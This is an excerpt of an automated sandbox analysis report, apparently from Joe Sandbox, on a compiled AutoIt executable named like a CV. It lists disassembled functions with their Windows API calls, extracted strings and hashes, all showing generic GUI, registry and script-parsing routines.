Opcode ID: d575e22921625428383450b493bfcf67c5530afde6d6b660ce9554d049c32d6e
Instruction ID: 6df5ad8f5d08bbfd0be0619971a44ab292dcc755f5e33f3ecace5c0c6d9aabda
Opcode Fuzzy Hash: d575e22921625428383450b493bfcf67c5530afde6d6b660ce9554d049c32d6e
Instruction Fuzzy Hash: A4514E71900208BFDF229FA4DC48EAE7B79FF09325F114515F919AB2A1D7719A80CF50

Function 0035B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0035B7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0035B7C1
CharNextW.USER32(0000014E), ref: 0035B7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0035B831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0035B847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0035B858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0035B875
SetWindowTextW.USER32(?,0000014E), ref: 0035B8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0035B8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 0035B90E
_memset.LIBCMT ref: 0035B933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0035B97C
_memset.LIBCMT ref: 0035B9DB
SendMessageW.USER32 ref: 0035BA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 0035BA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 0035BB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 0035BB2C
GetMenuItemInfoW.USER32(?), ref: 0035BB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0035BBA3
DrawMenuBar.USER32(?), ref: 0035BBB2
SetWindowTextW.USER32(?,0000014E), ref: 0035BBDA

Strings

0, xrefs: 0035BB4F

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 4c694e13b4e69e7ea8c470079d77ae2def4caf968bb85f78c1c846cd21ae07d8
Instruction ID: 45ecc31ff8efe3626f6934ec8a8a8f11c9355d3f165d45c68634f4fe39bacd57
Opcode Fuzzy Hash: 4c694e13b4e69e7ea8c470079d77ae2def4caf968bb85f78c1c846cd21ae07d8
Instruction Fuzzy Hash: DBE16F75900218AFDB229FA5CC85EEEBB7CFF05715F108159FD19AA1A0D7708A85CF60

Function 002F2EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 002F2F7A
IsWindow.USER32(?), ref: 003622FD

Strings

REGEXPCLASS, xrefs: 00362149
ALL, xrefs: 00362264
T+:, xrefs: 0036220E
INSTANCE, xrefs: 0036223C
LAST, xrefs: 003620B6
L+:, xrefs: 003621B2
P+:, xrefs: 003621E0
H+:, xrefs: 00362184
TITLE, xrefs: 00362292
ACTIVE, xrefs: 003620CC
CLASS, xrefs: 00362128
HANDLE, xrefs: 003620E2
REGEXPTITLE, xrefs: 003620F8

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$H+:$HANDLE$INSTANCE$L+:$LAST$P+:$REGEXPCLASS$REGEXPTITLE$T+:$TITLE
API String ID: 62970417-1085210021
Opcode ID: 0f7445c1d3a3a5fba4d1b54597b9ea69f12dc77fff4f867910172af627b63918
Instruction ID: 1796063569a2d6dde0e494414f0068b0b1b126931fa834b476685ca08c0fe2f3
Opcode Fuzzy Hash: 0f7445c1d3a3a5fba4d1b54597b9ea69f12dc77fff4f867910172af627b63918
Instruction Fuzzy Hash: 36D1D3302086469BCB06EF10C4919ABFBB4FF55340F118E2DF556576A1DB30E9AACF91

Function 0035764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0035778A
GetDesktopWindow.USER32 ref: 0035779F
GetWindowRect.USER32(00000000), ref: 003577A6
GetWindowLongW.USER32(?,000000F0), ref: 00357808
DestroyWindow.USER32(?), ref: 00357834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0035785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0035787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003578A1
SendMessageW.USER32(?,00000421,?,?), ref: 003578B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003578C9
IsWindowVisible.USER32(?), ref: 003578E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00357904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00357918
GetWindowRect.USER32(?,?), ref: 00357930
MonitorFromPoint.USER32(?,?,00000002), ref: 00357956
GetMonitorInfoW.USER32 ref: 00357970
CopyRect.USER32(?,?), ref: 00357987
SendMessageW.USER32(?,00000412,00000000), ref: 003579F2

Strings

(, xrefs: 00357965
0, xrefs: 00357735
tooltips_class32, xrefs: 00357856

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 7534429297ff9e05546fbbc89847fadd074828b2a38294cc771bbd14399aac73
Instruction ID: aaeb666a650a2ee00d34382386de350e8a6d501d7cf62b5c8331270a9b553afa
Opcode Fuzzy Hash: 7534429297ff9e05546fbbc89847fadd074828b2a38294cc771bbd14399aac73
Instruction Fuzzy Hash: 33B1BF71618300AFDB15DF64D849F6ABBE5FF88311F00891DF9999B2A1D770E848CB92

Function 0030A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0030A939
GetSystemMetrics.USER32(00000007), ref: 0030A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0030A96C
GetSystemMetrics.USER32(00000008), ref: 0030A974
GetSystemMetrics.USER32(00000004), ref: 0030A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0030A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0030A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0030A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0030AA0D
GetClientRect.USER32(00000000,000000FF), ref: 0030AA2B
GetStockObject.GDI32(00000011), ref: 0030AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 0030AA52

Part of subcall function 0030B63C: GetCursorPos.USER32(000000FF), ref: 0030B64F
Part of subcall function 0030B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0030B66C
Part of subcall function 0030B63C: GetAsyncKeyState.USER32(00000001), ref: 0030B691
Part of subcall function 0030B63C: GetAsyncKeyState.USER32(00000002), ref: 0030B69F

SetTimer.USER32(00000000,00000000,00000028,0030AB87), ref: 0030AA79

Strings

AutoIt v3 GUI, xrefs: 0030A9F1

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: c32550f3f233140533ad954ba6d2535f1c6db543f27a65793095182d9cd549c5
Instruction ID: 3b83b4e5dcc3a0e4b8be62e75a5a2ec07c3f11109809f9d448ab6f67aee96950
Opcode Fuzzy Hash: c32550f3f233140533ad954ba6d2535f1c6db543f27a65793095182d9cd549c5
Instruction Fuzzy Hash: 88B16C71A0120AAFDB16DFA8DC55BAE7BB8FF08314F114229FA15A72D0DB74E840CB51

Function 00353639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00353735
RegCreateKeyExW.ADVAPI32(?,?,00000000,0038DC00,00000000,?,00000000,?,?), ref: 003537A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003537EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00353874
RegCloseKey.ADVAPI32(?), ref: 00353B94
RegCloseKey.ADVAPI32(00000000), ref: 00353BA1

Strings

REG_SZ, xrefs: 003538B2
REG_BINARY, xrefs: 00353B2F
REG_MULTI_SZ, xrefs: 0035395C
REG_DWORD, xrefs: 00353A65
REG_EXPAND_SZ, xrefs: 00353811
REG_QWORD, xrefs: 00353AE2

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 85630ca8567db44d3eea97a90802042073a755dc99746409286204a209b75e82
Instruction ID: cafa83487165c6e19b0f6292ee1550fcf33ea3bd69e12e47aa3033e76125a96a
Opcode Fuzzy Hash: 85630ca8567db44d3eea97a90802042073a755dc99746409286204a209b75e82
Instruction Fuzzy Hash: F00259752046019FCB16EF14C895E2AB7E9FF88760F05846DF98A9B2A1CB30ED55CF81

Function 00356BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00356C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00356D16

Strings

VIEWCHANGE, xrefs: 00356ECD
GETITEMCOUNT, xrefs: 00356C84
SELECTCLEAR, xrefs: 00356D8D
GETTEXT, xrefs: 00356CBF
SELECT, xrefs: 00356DA8
DESELECT, xrefs: 00356DFC
FINDITEM, xrefs: 00356E81
SELECTINVERT, xrefs: 00356DDE
ISSELECTED, xrefs: 00356D21
GETSELECTED, xrefs: 00356E3C
GETSUBITEMCOUNT, xrefs: 00356CA1
GETSELECTEDCOUNT, xrefs: 00356CF9
SELECTALL, xrefs: 00356D75

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 810bdd593799b4300b80276679123527cc506bd3a78d53d125a790da2e06906d
Instruction ID: aa60608fa14ecbf167da71eb4f508ce6cac82f05ebd4248c5925589ae232c60f
Opcode Fuzzy Hash: 810bdd593799b4300b80276679123527cc506bd3a78d53d125a790da2e06906d
Instruction Fuzzy Hash: 30A18B342142459BCB16EF20C952E6AB3A6FF84351F50496DFC969B3E2DB31EC19CB81

Function 0032CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0032CF91
__swprintf.LIBCMT ref: 0032D032
_wcscmp.LIBCMT ref: 0032D045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0032D09A
_wcscmp.LIBCMT ref: 0032D0D6
GetClassNameW.USER32(?,?,00000400), ref: 0032D10D
GetDlgCtrlID.USER32(?), ref: 0032D15F
GetWindowRect.USER32(?,?), ref: 0032D195
GetParent.USER32(?), ref: 0032D1B3
ScreenToClient.USER32(00000000), ref: 0032D1BA
GetClassNameW.USER32(?,?,00000100), ref: 0032D234
_wcscmp.LIBCMT ref: 0032D248
GetWindowTextW.USER32(?,?,00000400), ref: 0032D26E
_wcscmp.LIBCMT ref: 0032D282

Strings

%s%u, xrefs: 0032D02C

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 2a13e380d72758fae9ce84727a91f94da322b38cf65a77e0a8e10cffe7f4fdc8
Instruction ID: deb5ce93c2c80a6d12a4f2eb15d21b664aacf04fd00d0bbe5e8c19bd0eae3fe5
Opcode Fuzzy Hash: 2a13e380d72758fae9ce84727a91f94da322b38cf65a77e0a8e10cffe7f4fdc8
Instruction Fuzzy Hash: 55A1D031204316EFD71ADF64D884BEAB7A8FF48354F008929FA99D6190DB30EA55CB91

Function 0032D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0032D8EB
_wcscmp.LIBCMT ref: 0032D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0032D924
CharUpperBuffW.USER32(?,00000000), ref: 0032D941
_wcscmp.LIBCMT ref: 0032D95F
_wcsstr.LIBCMT ref: 0032D970
GetClassNameW.USER32(00000018,?,00000400), ref: 0032D9A8
_wcscmp.LIBCMT ref: 0032D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0032D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 0032DA28
_wcscmp.LIBCMT ref: 0032DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 0032DA60
GetWindowRect.USER32(00000004,?), ref: 0032DAC9

Strings

ThumbnailClass, xrefs: 0032D9B3, 0032DA33
@, xrefs: 0032D8C6

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: e91affb6429374d900b3ab9cd74c24debd6f29653693103fb1d5d987c5e1b328
Instruction ID: 36ff205c9e2f01650e922bac717f8ae06d3a97472acf6fc1f76a00e1b71e4451
Opcode Fuzzy Hash: e91affb6429374d900b3ab9cd74c24debd6f29653693103fb1d5d987c5e1b328
Instruction Fuzzy Hash: A681F4310083159FDB16DF10E985FAA7BE8FF84754F04846AFD8A9A096DB30DD85CBA1

Function 0032D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0032D753

Strings

ALL, xrefs: 0032D7E7
[HANDLE:, xrefs: 0032D75F
LAST, xrefs: 0032D718
[REGEXPTITLE:, xrefs: 0032D77B
ACTIVE, xrefs: 0032D72E
[ALL, xrefs: 0032D7F9
[ACTIVE, xrefs: 0032D740
REGEXP=, xrefs: 0032D768
CLASSNAME=, xrefs: 0032D790
[CLASS:, xrefs: 0032D7A3
[LAST, xrefs: 0032D800
HANDLE=, xrefs: 0032D74C

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: b968cb7edf9ef12dc776d5846c7bdb149dfd2e6be6ca0a6e44bb49b0606af982
Instruction ID: 2f21924029a7f2331f976468f08deb5c47a02c59348cc53d668579f5b3b0b203
Opcode Fuzzy Hash: b968cb7edf9ef12dc776d5846c7bdb149dfd2e6be6ca0a6e44bb49b0606af982
Instruction Fuzzy Hash: 3E31B031644319AADB1AFE58ED43EEEB3B8DF21750F300139F541B50D1EB61AE54CA61

Function 0032EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0032EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0032EAC2
SetWindowTextW.USER32(?,?), ref: 0032EAD9
GetDlgItem.USER32(?,000003EA), ref: 0032EAEE
SetWindowTextW.USER32(00000000,?), ref: 0032EAF4
GetDlgItem.USER32(?,000003E9), ref: 0032EB04
SetWindowTextW.USER32(00000000,?), ref: 0032EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0032EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0032EB45
GetWindowRect.USER32(?,?), ref: 0032EB4E
SetWindowTextW.USER32(?,?), ref: 0032EBB9
GetDesktopWindow.USER32 ref: 0032EBBF
GetWindowRect.USER32(00000000), ref: 0032EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0032EC12
GetClientRect.USER32(?,?), ref: 0032EC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0032EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0032EC6F

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: b4c2a18af3445e5063c9368a5964423190815d65835676f37b8441ef274f932c
Instruction ID: b6664f0e71be9b0fc42092030e3939a9b7bb051000a8b0f096f8f2b51a380cbd
Opcode Fuzzy Hash: b4c2a18af3445e5063c9368a5964423190815d65835676f37b8441ef274f932c
Instruction Fuzzy Hash: 0C515D71900719EFDB22DFA8DD8AF6EBBF9FF04705F014928E586A65A0C774A944CB10

Function 003479B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 003479C6
LoadCursorW.USER32(00000000,00007F00), ref: 003479D1
LoadCursorW.USER32(00000000,00007F03), ref: 003479DC
LoadCursorW.USER32(00000000,00007F8B), ref: 003479E7
LoadCursorW.USER32(00000000,00007F01), ref: 003479F2
LoadCursorW.USER32(00000000,00007F81), ref: 003479FD
LoadCursorW.USER32(00000000,00007F88), ref: 00347A08
LoadCursorW.USER32(00000000,00007F80), ref: 00347A13
LoadCursorW.USER32(00000000,00007F86), ref: 00347A1E
LoadCursorW.USER32(00000000,00007F83), ref: 00347A29
LoadCursorW.USER32(00000000,00007F85), ref: 00347A34
LoadCursorW.USER32(00000000,00007F82), ref: 00347A3F
LoadCursorW.USER32(00000000,00007F84), ref: 00347A4A
LoadCursorW.USER32(00000000,00007F04), ref: 00347A55
LoadCursorW.USER32(00000000,00007F02), ref: 00347A60
LoadCursorW.USER32(00000000,00007F89), ref: 00347A6B
GetCursorInfo.USER32(?), ref: 00347A7B

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 4999e9fac59af0d46a220ca1c3cd93015b993c26b16b903142b1396f9ec8cac2
Instruction ID: d4a0518bef873881a261b44e6882643ca9a54a4fcbf1efbbb06cb695383c95db
Opcode Fuzzy Hash: 4999e9fac59af0d46a220ca1c3cd93015b993c26b16b903142b1396f9ec8cac2
Instruction Fuzzy Hash: B23107B1D4831A6ADB119FB68C8995FBFF8FF04750F50452AE50DEB280DB78A5008FA1

Function 002FC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 0030E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,002FC8B7,?,00002000,?,?,00000000,?,002F419E,?,?,?,0038DC00), ref: 0030E984

Part of subcall function 002F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002F53B1,?,?,002F61FF,?,00000000,00000001,00000000), ref: 002F662F

__wsplitpath.LIBCMT ref: 002FC93E

Part of subcall function 00311DFC: __wsplitpath_helper.LIBCMT ref: 00311E3C

_wcscpy.LIBCMT ref: 002FC953
_wcscat.LIBCMT ref: 002FC968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 002FC978
SetCurrentDirectoryW.KERNEL32(?), ref: 002FCABE

Part of subcall function 002FB337: _wcscpy.LIBCMT ref: 002FB36F

Strings

Unterminated string, xrefs: 00363470
AU3!, xrefs: 002FC90C
Bad directive syntax error, xrefs: 00363429
>>>AUTOIT SCRIPT<<<, xrefs: 0036311B
EA06, xrefs: 003630C9
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00363098
Error opening the file, xrefs: 003630B4, 0036313D

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: 1ceffc1604a5783f637293b77b440ce07960117e0b60ea87d3d932ca9be01f99
Instruction ID: 4c076a9ee00a10cc1e4e36fd7b1e15cb7ac3d89c53bc2a55207d57706d9d1ea8
Opcode Fuzzy Hash: 1ceffc1604a5783f637293b77b440ce07960117e0b60ea87d3d932ca9be01f99
Instruction Fuzzy Hash: E912D0305083499FC726EF24C991AAFFBE4BF89344F10492EF58997291DB30DA59CB52

Function 0035CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0035CEFB
